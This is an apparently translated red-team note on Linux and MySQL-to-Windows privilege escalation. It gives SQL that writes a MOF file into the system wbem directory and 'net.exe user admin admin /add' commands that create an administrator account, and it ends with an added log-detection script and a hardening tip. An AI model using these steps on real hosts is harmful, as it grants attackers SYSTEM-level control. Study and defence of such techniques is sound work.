Privilege Escalation
I. Common Linux privilege escalation
黑白之道, Red-team testing: a summary of Linux privilege escalation: https://mp.weixin.qq.com/s/BOCQoZLK_IXKXIqzFA4yFA
- Kernel vulnerabilities
- Scheduled tasks (cron)
- SUID files
- Sudo misconfiguration
- NFS shares
- Third-party services
1. Linux kernel privilege escalation vulnerability: Dirty COW
```
# 1. On the victim host: receive the exploit script over netcat
nc -l 2333 > 获得脚本.py
```
2. Scheduled tasks
pspy, a helper tool for monitoring processes: https://github.com/DominicBreuker/pspy
3. SUID privilege escalation
LinEnum.py: https://github.com/rebootuser/LinEnum
II. MySQL privilege escalation
1. MOF file privilege escalation
MOF (Managed Object Format) is a Windows system file type; the file in question lives at c:\windows\system32\wbem\mof\nullevt.mof, and its job is to monitor process creation and termination every 5 seconds. The basic MOF escalation flow is: once you hold MySQL root privileges, use them to perform an upload that writes our rewritten MOF file; the server then executes that file every 5 seconds with SYSTEM privileges. The rewritten MOF contains a VBS script segment, which in most cases is a cmd command that adds an administrator user.
The root cause that makes escalation possible is that a thread with higher privileges executes the command. Here nullevt.mof is loaded by the SYSTEM user, so we can raise our privileges at most to SYSTEM.
Prerequisites
- Windows version <= 2003
- The c:\windows\system32\wbem\mof directory is writable
- The database accepts remote connections, and the root account password is known
Exploit code
```
#pragma namespace("\\\\.\\root\\subscription")
```
The key is line 14 of the MOF file: "net.exe user admin admin /add", which creates a user named admin with password admin. Once that succeeds, change the command to "net.exe localgroup administrators admin /add" and upload again, which creates the admin user and adds it to the administrators group.
Exploitation process
0x0. When you have a webshell on the site
If you already have a webshell on the site, upload nullevt.mof to a writable directory xxx on the C: drive, then run the following SQL:
```sql
select load_file('c:\\xxx\\nullevt.mof') into dumpfile 'c:\\windows\\system32\\wbem\\mof\\nullevt.mof';
```
Note the difference between dumpfile and outfile: into outfile automatically adds newline characters and similar formatting, which suits text files but not code, since the redundant data makes our command execution fail. into dumpfile writes the file as raw binary, which is why into dumpfile is used here.
0x1. When you do not have a webshell
Without a webshell, connect to the database and write the file directly: convert the MOF code to ASCII codes and pass them in directly.
```sql
select char(...) into dumpfile 'c:\\windows\\system32\\wbem\\mof\\nullevt.mof';
```
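A defender-side complement, added here and not part of the original note: detection logic run over constructed MySQL general_log lines that flags the file-writing statements shown above (into dumpfile/outfile, load_file(), char()-assembled payloads) and rates writes into the WMI MOF auto-compile directory as high severity. The log lines, thread ids and paths are constructed samples, not real captures.

```python
import re

# Constructed sample lines in MySQL general_log file format
# ("<time>\t<thread id> <command>\t<argument>"); not real captures.
SAMPLE_LOG = """\
2024-05-01T10:00:02.000000Z\t    7 Query\tselect load_file('c:\\\\xxx\\\\nullevt.mof') into dumpfile 'c:\\\\windows\\\\system32\\\\wbem\\\\mof\\\\nullevt.mof'
2024-05-01T10:00:05.000000Z\t    8 Query\tselect char(35,112,114,97,103,109,97,32,110,97,109,101) into dumpfile 'C:/Windows/System32/wbem/mof/evil.mof'
2024-05-01T10:00:09.000000Z\t    9 Query\tselect id, name from customers into outfile '/var/lib/mysql-files/export.csv'
2024-05-01T10:00:12.000000Z\t    9 Query\tselect count(*) from orders
"""

FILE_WRITE = re.compile(r"\binto\s+(dumpfile|outfile)\s+'([^']+)'", re.I)
LOAD_FILE = re.compile(r"\bload_file\s*\(", re.I)
CHAR_BLOB = re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+){7,}", re.I)  # bytes assembled inline
MOF_TARGET = re.compile(r"wbem[\\/]+mof[\\/]|\.mof$", re.I)           # WMI auto-compile dir


def parse_general_log(text):
    """Yield (thread_id, command, argument) for each well-formed general_log line."""
    for line in text.splitlines():
        parts = line.split("\t", 2)
        if len(parts) == 3:
            thread_id, command = parts[1].split(None, 1)
            yield int(thread_id), command, parts[2]


def classify(argument):
    """Return (severity, target, reasons) for a statement that writes a file, else None."""
    m = FILE_WRITE.search(argument)
    if not m:
        return None
    mode, target = m.group(1).lower(), m.group(2)
    reasons = ["into " + mode]
    if LOAD_FILE.search(argument):
        reasons.append("load_file() copies a server-side file")
    if CHAR_BLOB.search(argument):
        reasons.append("payload assembled from char() bytes")
    if MOF_TARGET.search(target):
        reasons.append("target is the WMI MOF auto-compile path")
        return "high", target, reasons
    # A dumpfile write, or any raw-byte trick, outside that path still deserves review.
    return ("medium" if mode == "dumpfile" or len(reasons) > 1 else "low"), target, reasons


def scan_general_log(text):
    """Collect one finding per Query line that writes a file on the database host."""
    findings = []
    for thread_id, command, argument in parse_general_log(text):
        result = classify(argument) if command == "Query" else None
        if result:
            findings.append({"thread_id": thread_id, "severity": result[0],
                             "target": result[1], "reasons": result[2]})
    return findings
```

Beyond detection, setting secure_file_priv to a dedicated directory makes the server refuse load_file() and INTO DUMPFILE/OUTFILE targets outside it, which removes the write prerequisite at the source.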